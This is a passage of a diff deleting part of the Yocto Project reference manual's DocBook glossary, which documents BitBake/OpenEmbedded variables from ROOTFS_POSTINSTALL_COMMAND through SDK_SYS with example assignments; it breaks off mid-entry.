-                    The <filename>ROOTFS</filename> variable is an optional
-                    variable used with the
-                    <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
-                    class.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ROOTFS_POSTINSTALL_COMMAND'><glossterm>ROOTFS_POSTINSTALL_COMMAND</glossterm>
-            <info>
-                ROOTFS_POSTINSTALL_COMMAND[doc] = "Specifies a list of functions to call after installing packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions to call after the
-                    OpenEmbedded build system has installed packages.
-                    You can specify functions separated by semicolons:
-                    <literallayout class='monospaced'>
-     ROOTFS_POSTINSTALL_COMMAND += "<replaceable>function</replaceable>; ... "
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you need to pass the root filesystem path to a command
-                    within a function, you can use
-                    <filename>${IMAGE_ROOTFS}</filename>, which points to
-                    the directory that becomes the root filesystem image.
-                    See the
-                    <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ROOTFS_POSTPROCESS_COMMAND'><glossterm>ROOTFS_POSTPROCESS_COMMAND</glossterm>
-            <info>
-                ROOTFS_POSTPROCESS_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system has created the root filesystem."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions to call once the
-                    OpenEmbedded build system has created the root filesystem.
-                    You can specify functions separated by semicolons:
-                    <literallayout class='monospaced'>
-     ROOTFS_POSTPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you need to pass the root filesystem path to a command
-                    within a function, you can use
-                    <filename>${IMAGE_ROOTFS}</filename>, which points to
-                    the directory that becomes the root filesystem image.
-                    See the
-                    <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ROOTFS_POSTUNINSTALL_COMMAND'><glossterm>ROOTFS_POSTUNINSTALL_COMMAND</glossterm>
-            <info>
-                ROOTFS_POSTUNINSTALL_COMMAND[doc] = "Specifies a list of functions to call after removal of unneeded packages."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions to call after the
-                    OpenEmbedded build system has removed unnecessary
-                    packages.
-                    When runtime package management is disabled in the
-                    image, several packages are removed including
-                    <filename>base-passwd</filename>,
-                    <filename>shadow</filename>, and
-                    <filename>update-alternatives</filename>.
-                    You can specify functions separated by semicolons:
-                    <literallayout class='monospaced'>
-     ROOTFS_POSTUNINSTALL_COMMAND += "<replaceable>function</replaceable>; ... "
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you need to pass the root filesystem path to a command
-                    within a function, you can use
-                    <filename>${IMAGE_ROOTFS}</filename>, which points to
-                    the directory that becomes the root filesystem image.
-                    See the
-                    <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ROOTFS_PREPROCESS_COMMAND'><glossterm>ROOTFS_PREPROCESS_COMMAND</glossterm>
-            <info>
-                ROOTFS_PREPROCESS_COMMAND[doc] = "Specifies a list of functions to call before the OpenEmbedded build system has created the root filesystem."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions to call before the
-                    OpenEmbedded build system has created the root filesystem.
-                    You can specify functions separated by semicolons:
-                    <literallayout class='monospaced'>
-     ROOTFS_PREPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you need to pass the root filesystem path to a command
-                    within a function, you can use
-                    <filename>${IMAGE_ROOTFS}</filename>, which points to
-                    the directory that becomes the root filesystem image.
-                    See the
-                    <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-RPROVIDES'><glossterm>RPROVIDES</glossterm>
-            <info>
-                RPROVIDES[doc] = "A list of package name aliases that a package also provides. These aliases are useful for satisfying runtime dependencies of other packages both during the build and on the target."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of package name aliases that a package also provides.
-                    These aliases are useful for satisfying runtime dependencies
-                    of other packages both during the build and on the target
-                    (as specified by
-                    <filename><link linkend='var-RDEPENDS'>RDEPENDS</link></filename>).
-                    <note>
-                        A package's own name is implicitly already in its
-                        <filename>RPROVIDES</filename> list.
-                    </note>
-                </para>
-
-                <para>
-                   As with all package-controlling variables, you must always
-                   use the variable in conjunction with a package name override.
-                   Here is an example:
-                   <literallayout class='monospaced'>
-     RPROVIDES_${PN} = "widget-abi-2"
-                   </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-RRECOMMENDS'><glossterm>RRECOMMENDS</glossterm>
-            <info>
-                RRECOMMENDS[doc] = "A list of packages that extends the usability of a package being built. The package being built does not depend on this list of packages in order to successfully build, but needs them for the extended usability."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of packages that extends the usability of a package
-                    being built.
-                    The package being built does not depend on this list of
-                    packages in order to successfully build, but rather
-                    uses them for extended usability.
-                    To specify runtime dependencies for packages, see the
-                    <filename><link linkend='var-RDEPENDS'>RDEPENDS</link></filename>
-                    variable.
-                </para>
-
-                <para>
-                    The package manager will automatically install the
-                    <filename>RRECOMMENDS</filename> list of packages when
-                    installing the built package.
-                    However, you can prevent listed packages from being
-                    installed by using the
-                    <link linkend='var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></link>,
-                    <link linkend='var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></link>,
-                    and
-                    <link linkend='var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></link>
-                    variables.
-                </para>
-
-                <para>
-                    Packages specified in
-                    <filename>RRECOMMENDS</filename> need not actually be
-                    produced.
-                    However, a recipe must exist that provides each package,
-                    either through the
-                    <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
-                    or
-                    <link linkend='var-PACKAGES_DYNAMIC'><filename>PACKAGES_DYNAMIC</filename></link>
-                    variables or the
-                    <link linkend='var-RPROVIDES'><filename>RPROVIDES</filename></link>
-                    variable, or an error will occur during the build.
-                    If such a recipe does exist and the package is not produced,
-                    the build continues without error.
-                </para>
-
-                <para>
-                    Because the <filename>RRECOMMENDS</filename> variable
-                    applies to packages being built, you should always attach
-                    an override to the variable to specify the particular
-                    package whose usability is being extended.
-                    For example, suppose you are building a development package
-                    that is extended to support wireless functionality.
-                    In this case, you would use the following:
-                    <literallayout class='monospaced'>
-     RRECOMMENDS_${PN}-dev += "<replaceable>wireless_package_name</replaceable>"
-                    </literallayout>
-                    In the example, the package name
-                    (<filename>${<link linkend='var-PN'>PN</link>}-dev</filename>)
-                    must appear as it would in the
-                    <filename>PACKAGES</filename> namespace before any renaming
-                    of the output package by classes such as
-                    <filename>debian.bbclass</filename>.
-                </para>
-
-                <para>
-                    BitBake, which the OpenEmbedded build system uses, supports
-                    specifying versioned recommends.
-                    Although the syntax varies depending on the packaging
-                    format, BitBake hides these differences from you.
-                    Here is the general syntax to specify versions with
-                    the <filename>RRECOMMENDS</filename> variable:
-                    <literallayout class='monospaced'>
-     RRECOMMENDS_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
-                    </literallayout>
-                    For <filename>operator</filename>, you can specify the
-                    following:
-                    <literallayout class='monospaced'>
-     =
-     &lt;
-     &gt;
-     &lt;=
-     &gt;=
-                    </literallayout>
-                    For example, the following sets up a recommend on version
-                    1.2 or greater of the package <filename>foo</filename>:
-                    <literallayout class='monospaced'>
-     RRECOMMENDS_${PN} = "foo (>= 1.2)"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-RREPLACES'><glossterm>RREPLACES</glossterm>
-            <info>
-                RREPLACES[doc] = "A list of packages replaced by a package. The package manager uses this variable to determine which package should be installed to replace other package(s) during an upgrade."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of packages replaced by a package.
-                    The package manager uses this variable to determine which
-                    package should be installed to replace other package(s)
-                    during an upgrade.
-                    In order to also have the other package(s) removed at the
-                    same time, you must add the name of the other
-                    package to the
-                    <filename><link linkend='var-RCONFLICTS'>RCONFLICTS</link></filename> variable.
-                </para>
-
-                <para>
-                   As with all package-controlling variables, you must use
-                   this variable in conjunction with a package name
-                   override.
-                   Here is an example:
-                   <literallayout class='monospaced'>
-     RREPLACES_${PN} = "<replaceable>other_package_being_replaced</replaceable>"
-                   </literallayout>
-                </para>
-
-                <para>
-                    BitBake, which the OpenEmbedded build system uses, supports
-                    specifying versioned replacements.
-                    Although the syntax varies depending on the packaging
-                    format, BitBake hides these differences from you.
-                    Here is the general syntax to specify versions with
-                    the <filename>RREPLACES</filename> variable:
-                    <literallayout class='monospaced'>
-     RREPLACES_${PN} = "<replaceable>package</replaceable> (<replaceable>operator</replaceable> <replaceable>version</replaceable>)"
-                    </literallayout>
-                    For <filename>operator</filename>, you can specify the
-                    following:
-                    <literallayout class='monospaced'>
-     =
-     &lt;
-     &gt;
-     &lt;=
-     &gt;=
-                    </literallayout>
-                    For example, the following sets up a replacement using
-                    version 1.2 or greater of the package
-                    <filename>foo</filename>:
-                    <literallayout class='monospaced'>
-     RREPLACES_${PN} = "foo (>= 1.2)"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-RSUGGESTS'><glossterm>RSUGGESTS</glossterm>
-            <info>
-                RSUGGESTS[doc] = "A list of additional packages that you can suggest for installation by the package manager at the time a package is installed. Not all package managers support this functionality."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of additional packages that you can suggest for
-                    installation by the package manager at the time a package
-                    is installed.
-                    Not all package managers support this functionality.
-                </para>
-
-                <para>
-                   As with all package-controlling variables, you must always
-                   use this variable in conjunction with a package name
-                   override.
-                   Here is an example:
-                   <literallayout class='monospaced'>
-     RSUGGESTS_${PN} = "<replaceable>useful_package</replaceable> <replaceable>another_package</replaceable>"
-                   </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-s'><title>S</title>
-
-        <glossentry id='var-S'><glossterm>S</glossterm>
-            <info>
-                S[doc] = "The location in the Build Directory where unpacked package source code resides."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The location in the
-                    <link linkend='build-directory'>Build Directory</link>
-                    where unpacked recipe source code resides.
-                    By default, this directory is
-                    <filename>${</filename><link linkend='var-WORKDIR'><filename>WORKDIR</filename></link><filename>}/${</filename><link linkend='var-BPN'><filename>BPN</filename></link><filename>}-${</filename><link linkend='var-PV'><filename>PV</filename></link><filename>}</filename>,
-                    where <filename>${BPN}</filename> is the base recipe name
-                    and <filename>${PV}</filename> is the recipe version.
-                    If the source tarball extracts the code to a directory
-                    named anything other than <filename>${BPN}-${PV}</filename>,
-                    or if the source code is fetched from an SCM such as
-                    Git or Subversion, then you must set <filename>S</filename>
-                    in the recipe so that the OpenEmbedded build system
-                    knows where to find the unpacked source.
-                </para>
-
-                <para>
-                    As an example, assume a
-                    <link linkend='source-directory'>Source Directory</link>
-                    top-level folder named <filename>poky</filename> and a
-                    default Build Directory at <filename>poky/build</filename>.
-                    In this case, the work directory the build system uses
-                    to keep the unpacked recipe for <filename>db</filename>
-                    is the following:
-                    <literallayout class='monospaced'>
-     poky/build/tmp/work/qemux86-poky-linux/db/5.1.19-r3/db-5.1.19
-                    </literallayout>
-                    The unpacked source code resides in the
-                    <filename>db-5.1.19</filename> folder.
-                </para>
-
-                <para>
-                    This next example assumes a Git repository.
-                    By default, Git repositories are cloned to
-                    <filename>${WORKDIR}/git</filename> during
-                    <link linkend='ref-tasks-fetch'><filename>do_fetch</filename></link>.
-                    Since this path is different from the default value of
-                    <filename>S</filename>, you must set it specifically
-                    so the source can be located:
-                    <literallayout class='monospaced'>
-     SRC_URI = "git://path/to/repo.git"
-     S = "${WORKDIR}/git"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SANITY_REQUIRED_UTILITIES'><glossterm>SANITY_REQUIRED_UTILITIES</glossterm>
-            <info>
-                SANITY_REQUIRED_UTILITIES[doc] = "Specifies a list of command-line utilities that should be checked for during the initial sanity checking process when running BitBake."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of command-line utilities that should be
-                    checked for during the initial sanity checking process when
-                    running BitBake.
-                    If any of the utilities are not installed on the build host,
-                    then BitBake immediately exits with an error.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SANITY_TESTED_DISTROS'><glossterm>SANITY_TESTED_DISTROS</glossterm>
-            <info>
-                SANITY_TESTED_DISTROS[doc] = "A list of the host distribution identifiers that the build system has been tested against."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of the host distribution identifiers that the
-                    build system has been tested against.
-                    Identifiers consist of the host distributor ID
-                    followed by the release,
-                    as reported by the <filename>lsb_release</filename> tool
-                    or as read from <filename>/etc/lsb-release</filename>.
-                    Separate the list items with explicit newline
-                    characters (<filename>\n</filename>).
-                    If <filename>SANITY_TESTED_DISTROS</filename> is not empty
-                    and the current value of
-                    <link linkend='var-NATIVELSBSTRING'><filename>NATIVELSBSTRING</filename></link>
-                    does not appear in the list, then the build system reports
-                    a warning that indicates the current host distribution has
-                    not been tested as a build host.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_ARCH'><glossterm>SDK_ARCH</glossterm>
-            <info>
-                SDK_ARCH[doc] = "The target architecture for the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The target architecture for the SDK.
-                    Typically, you do not directly set this variable.
-                    Instead, use
-                    <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_DEPLOY'><glossterm>SDK_DEPLOY</glossterm>
-            <info>
-                SDK_DEPLOY[doc] = "The directory set up and used by the populate_sdk_base to which the SDK is deployed."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The directory set up and used by the
-                    <link linkend='ref-classes-populate-sdk'><filename>populate_sdk_base</filename></link>
-                    class to which the SDK is deployed.
-                    The <filename>populate_sdk_base</filename> class defines
-                    <filename>SDK_DEPLOY</filename> as follows:
-                    <literallayout class='monospaced'>
-     SDK_DEPLOY = "${TMPDIR}/deploy/sdk"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_DIR'><glossterm>SDK_DIR</glossterm>
-            <info>
-                SDK_DIR[doc] = "The parent directory used by the OpenEmbedded build system when creating SDK output."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The parent directory used by the OpenEmbedded build system
-                    when creating SDK output.
-                    The
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
-                    class defines the variable as follows:
-                    <literallayout class='monospaced'>
-     SDK_DIR = "${WORKDIR}/sdk"
-                    </literallayout>
-                    <note>
-                        The <filename>SDK_DIR</filename> directory is a
-                        temporary directory as it is part of
-                        <filename>WORKDIR</filename>.
-                        The final output directory is
-                        <link linkend='var-SDK_DEPLOY'><filename>SDK_DEPLOY</filename></link>.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_EXT_TYPE'><glossterm>SDK_EXT_TYPE</glossterm>
-            <info>
-                SDK_EXT_TYPE[doc] = "Controls whether or not shared state artifacts are copied into the extensible SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Controls whether or not shared state artifacts are copied
-                    into the extensible SDK.
-                    The default value of "full" copies all of the required
-                    shared state artifacts into the extensible SDK.
-                    The value "minimal" leaves these artifacts out of the
-                    SDK.
-                    <note>
-                        If you set the variable to "minimal", you need to
-                        ensure
-                        <link linkend='var-SSTATE_MIRRORS'><filename>SSTATE_MIRRORS</filename></link>
-                        is set in the SDK's configuration to enable the
-                        artifacts to be fetched as needed.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_HOST_MANIFEST'><glossterm>SDK_HOST_MANIFEST</glossterm>
-            <info>
-                SDK_HOST_MANIFEST[doc] = "The manifest file for the host part of the SDK. This file lists all the installed packages that make up the host part of the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The manifest file for the host part of the SDK.
-                    This file lists all the installed packages that make up
-                    the host part of the SDK.
-                    The file contains package information on a line-per-package
-                    basis as follows:
-                    <literallayout class='monospaced'>
-     <replaceable>packagename</replaceable> <replaceable>packagearch</replaceable> <replaceable>version</replaceable>
-                    </literallayout>
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
-                    class defines the manifest file as follows:
-                    <literallayout class='monospaced'>
-     SDK_HOST_MANIFEST = "${SDK_DEPLOY}/${TOOLCHAIN_OUTPUTNAME}.host.manifest"
-                    </literallayout>
-                    The location is derived using the
-                    <link linkend='var-SDK_DEPLOY'><filename>SDK_DEPLOY</filename></link>
-                    and
-                    <link linkend='var-TOOLCHAIN_OUTPUTNAME'><filename>TOOLCHAIN_OUTPUTNAME</filename></link>
-                    variables.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_INCLUDE_PKGDATA'><glossterm>SDK_INCLUDE_PKGDATA</glossterm>
-            <info>
-                SDK_INCLUDE_PKGDATA[doc] = "When set to "1", specifies to include the packagedata for all recipes in the "world" target in the extensible SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When set to "1", specifies to include the packagedata for
-                    all recipes in the "world" target in the extensible SDK.
-                    Including this data allows the
-                    <filename>devtool search</filename> command to find these
-                    recipes in search results, as well as allows the
-                    <filename>devtool add</filename> command to map
-                    dependencies more effectively.
-                    <note>
-                        Enabling the <filename>SDK_INCLUDE_PKGDATA</filename>
-                        variable significantly increases build time because
-                        all of world needs to be built.
-                        Enabling the variable also slightly increases the size
-                        of the extensible SDK.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_INCLUDE_TOOLCHAIN'><glossterm>SDK_INCLUDE_TOOLCHAIN</glossterm>
-            <info>
-                SDK_INCLUDE_TOOLCHAIN[doc] = "When set to "1", specifies to include the toolchain in the extensible SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When set to "1", specifies to include the toolchain in the
-                    extensible SDK.
-                    Including the toolchain is useful particularly when
-                    <link linkend='var-SDK_EXT_TYPE'><filename>SDK_EXT_TYPE</filename></link>
-                    is set to "minimal" to keep the SDK reasonably small
-                    but you still want to provide a usable toolchain.
-                    For example, suppose you want to use the toolchain from an
-                    IDE or from other tools and you do not
-                    want to perform additional steps to install the toolchain.
-                </para>
-
-                <para>
-                    The <filename>SDK_INCLUDE_TOOLCHAIN</filename> variable
-                    defaults to "0" if <filename>SDK_EXT_TYPE</filename>
-                    is set to "minimal", and defaults to "1" if
-                    <filename>SDK_EXT_TYPE</filename> is set to "full".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_INHERIT_BLACKLIST'><glossterm>SDK_INHERIT_BLACKLIST</glossterm>
-            <info>
-                SDK_INHERIT_BLACKLIST[doc] = "A list of classes to remove from the INHERIT value globally within the extensible SDK configuration."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of classes to remove from the
-                    <link linkend='var-INHERIT'><filename>INHERIT</filename></link>
-                    value globally within the extensible SDK configuration.
-                    The
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate-sdk-ext</filename></link>
-                    class sets the default value:
-                    <literallayout class='monospaced'>
-     SDK_INHERIT_BLACKLIST ?= "buildhistory icecc"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Some classes are not generally applicable within
-                    the extensible SDK context.
-                    You can use this variable to disable those classes.
-                </para>
-
-                <para>
-                    For additional information on how to customize the
-                    extensible SDK's configuration, see the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-configuring-the-extensible-sdk'>Configuring the Extensible SDK</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_LOCAL_CONF_BLACKLIST'><glossterm>SDK_LOCAL_CONF_BLACKLIST</glossterm>
-            <info>
-                SDK_LOCAL_CONF_BLACKLIST[doc] = "A list of variables not allowed through from the build system configuration into the extensible SDK configuration."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of variables not allowed through from the
-                    OpenEmbedded build system configuration into the extensible
-                    SDK configuration.
-                    Usually, these are variables that are specific to the
-                    machine on which the build system is running and thus
-                    would be potentially problematic within the extensible SDK.
-                    </para>
-
-                    <para>By default,
-                    <filename>SDK_LOCAL_CONF_BLACKLIST</filename> is set in the
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate-sdk-ext</filename></link>
-                    class and excludes the following variables:
-                    <literallayout class='monospaced'>
-     <link linkend='var-CONF_VERSION'>CONF_VERSION</link>
-     <link linkend='var-BB_NUMBER_THREADS'>BB_NUMBER_THREADS</link>
-     <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_NUMBER_PARSE_THREADS'>BB_NUMBER_PARSE_THREADS</ulink>
-     <link linkend='var-PARALLEL_MAKE'>PARALLEL_MAKE</link>
-     <link linkend='var-PRSERV_HOST'>PRSERV_HOST</link>
-     <link linkend='var-SSTATE_MIRRORS'>SSTATE_MIRRORS</link>
-     <link linkend='var-DL_DIR'>DL_DIR</link>
-     <link linkend='var-SSTATE_DIR'>SSTATE_DIR</link>
-     <link linkend='var-TMPDIR'>TMPDIR</link>
-     <link linkend='var-BB_SERVER_TIMEOUT'>BB_SERVER_TIMEOUT</link>
-                    </literallayout>
-                </para>
-
-                <para>
-                    For additional information on how to customize the
-                    extensible SDK's configuration, see the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-configuring-the-extensible-sdk'>Configuring the Extensible SDK</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual.
-                </para>
-
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_LOCAL_CONF_WHITELIST'><glossterm>SDK_LOCAL_CONF_WHITELIST</glossterm>
-            <info>
-                SDK_LOCAL_CONF_WHITELIST[doc] = "A list of variables allowed through from the build system configuration into the extensible SDK configuration."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of variables allowed through from the OpenEmbedded
-                    build system configuration into the extensible SDK
-                    configuration.
-                    By default, the list of variables is empty and is set in
-                    the
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate-sdk-ext</filename></link>
-                    class.
-                </para>
-
-                <para>
-                    This list overrides the variables specified using the
-                    <link linkend='var-SDK_LOCAL_CONF_BLACKLIST'><filename>SDK_LOCAL_CONF_BLACKLIST</filename></link>
-                    variable as well as any variables identified by automatic
-                    blacklisting due to the "/" character being found at the
-                    start of the value, which is usually indicative of being a
-                    path and thus might not be valid on the system where the
-                    SDK is installed.
-                </para>
-
-                <para>
-                    For additional information on how to customize the
-                    extensible SDK's configuration, see the
-                    "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-configuring-the-extensible-sdk'>Configuring the Extensible SDK</ulink>"
-                    section in the Yocto Project Application Development and
-                    the Extensible Software Development Kit (eSDK) manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_NAME'><glossterm>SDK_NAME</glossterm>
-            <info>
-                SDK_NAME[doc] = "The base name for SDK output files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The base name for SDK output files.
-                    The name is derived from the
-                    <link linkend='var-DISTRO'><filename>DISTRO</filename></link>,
-                    <link linkend='var-TCLIBC'><filename>TCLIBC</filename></link>,
-                    <link linkend='var-SDK_ARCH'><filename>SDK_ARCH</filename></link>,
-                    <link linkend='var-IMAGE_BASENAME'><filename>IMAGE_BASENAME</filename></link>,
-                    and
-                    <link linkend='var-TUNE_PKGARCH'><filename>TUNE_PKGARCH</filename></link>
-                    variables:
-                    <literallayout class='monospaced'>
-     SDK_NAME = "${DISTRO}-${TCLIBC}-${SDK_ARCH}-${IMAGE_BASENAME}-${TUNE_PKGARCH}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_OS'><glossterm>SDK_OS</glossterm>
-            <info>
-                SDK_OS[doc] = "The operating system for which the SDK will be built."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the operating system for which the SDK
-                    will be built.
-                    The default value is the value of
-                    <link linkend='var-BUILD_OS'><filename>BUILD_OS</filename></link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_OUTPUT'><glossterm>SDK_OUTPUT</glossterm>
-            <info>
-                SDK_OUTPUT[doc] = "The location used by the OpenEmbedded build system when creating SDK output."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The location used by the OpenEmbedded build system when
-                    creating SDK output.
-                    The
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_base</filename></link>
-                    class defines the variable as follows:
-                    <literallayout class='monospaced'>
-     SDK_DIR = "${WORKDIR}/sdk"
-     SDK_OUTPUT = "${SDK_DIR}/image"
-     SDK_DEPLOY = "${DEPLOY_DIR}/sdk"
-                    </literallayout>
-                    <note>
-                        The <filename>SDK_OUTPUT</filename> directory is a
-                        temporary directory as it is part of
-                        <link linkend='var-WORKDIR'><filename>WORKDIR</filename></link>
-                        by way of
-                        <link linkend='var-SDK_DIR'><filename>SDK_DIR</filename></link>.
-                        The final output directory is
-                        <link linkend='var-SDK_DEPLOY'><filename>SDK_DEPLOY</filename></link>.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_PACKAGE_ARCHS'><glossterm>SDK_PACKAGE_ARCHS</glossterm>
-            <info>
-                SDK_PACKAGE_ARCHS[doc] = "Specifies a list of architectures compatible with the SDK machine. This variable is set automatically and should not normally be hand-edited."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of architectures compatible with
-                    the SDK machine.
-                    This variable is set automatically and should not
-                    normally be hand-edited.
-                    Entries are separated using spaces and listed in order
-                    of priority.
-                    The default value for
-                    <filename>SDK_PACKAGE_ARCHS</filename> is "all any noarch
-                    ${SDK_ARCH}-${SDKPKGSUFFIX}".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_POSTPROCESS_COMMAND'><glossterm>SDK_POSTPROCESS_COMMAND</glossterm>
-            <info>
-                SDK_POSTPROCESS_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system creates the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions to call once the
-                    OpenEmbedded build system creates the SDK.
-                    You can specify functions separated by semicolons:
-                    <literallayout class='monospaced'>
-     SDK_POSTPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you need to pass an SDK path to a command within a
-                    function, you can use
-                    <filename>${SDK_DIR}</filename>, which points to
-                    the parent directory used by the OpenEmbedded build system
-                    when creating SDK output.
-                    See the
-                    <link linkend='var-SDK_DIR'><filename>SDK_DIR</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_PREFIX'><glossterm>SDK_PREFIX</glossterm>
-            <info>
-                SDK_PREFIX[doc] = "The toolchain binary prefix used for nativesdk recipes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The toolchain binary prefix used for
-                    <filename>nativesdk</filename> recipes.
-                    The OpenEmbedded build system uses the
-                    <filename>SDK_PREFIX</filename> value to set the
-                    <link linkend='var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></link>
-                    when building <filename>nativesdk</filename> recipes.
-                    The default value is "${SDK_SYS}-".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_RECRDEP_TASKS'><glossterm>SDK_RECRDEP_TASKS</glossterm>
-            <info>
-                SDK_RECRDEP_TASKS[doc] = "A list of shared state tasks added to the extensible SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of shared state tasks added to the extensible SDK.
-                    By default, the following tasks are added:
-                    <literallayout class='monospaced'>
-     do_populate_lic
-     do_package_qa
-     do_populate_sysroot
-     do_deploy
-                    </literallayout>
-                    Despite the default value of "" for the
-                    <filename>SDK_RECRDEP_TASKS</filename> variable, the
-                    above four tasks are always added to the SDK.
-                    To specify tasks beyond these four, you need to use
-                    the <filename>SDK_RECRDEP_TASKS</filename> variable (e.g.
-                    you are defining additional tasks that are needed in
-                    order to build
-                    <link linkend='var-SDK_TARGETS'><filename>SDK_TARGETS</filename></link>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-SDK_SYS'><glossterm>SDK_SYS</glossterm>
-            <info>
-                SDK_SYS[doc] = "Specifies the system, including the architecture and the operating system, for which the SDK will be built."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the system, including the architecture and the
-                    operating system, for which the SDK will be built.
-                </para>
-
-                <para>
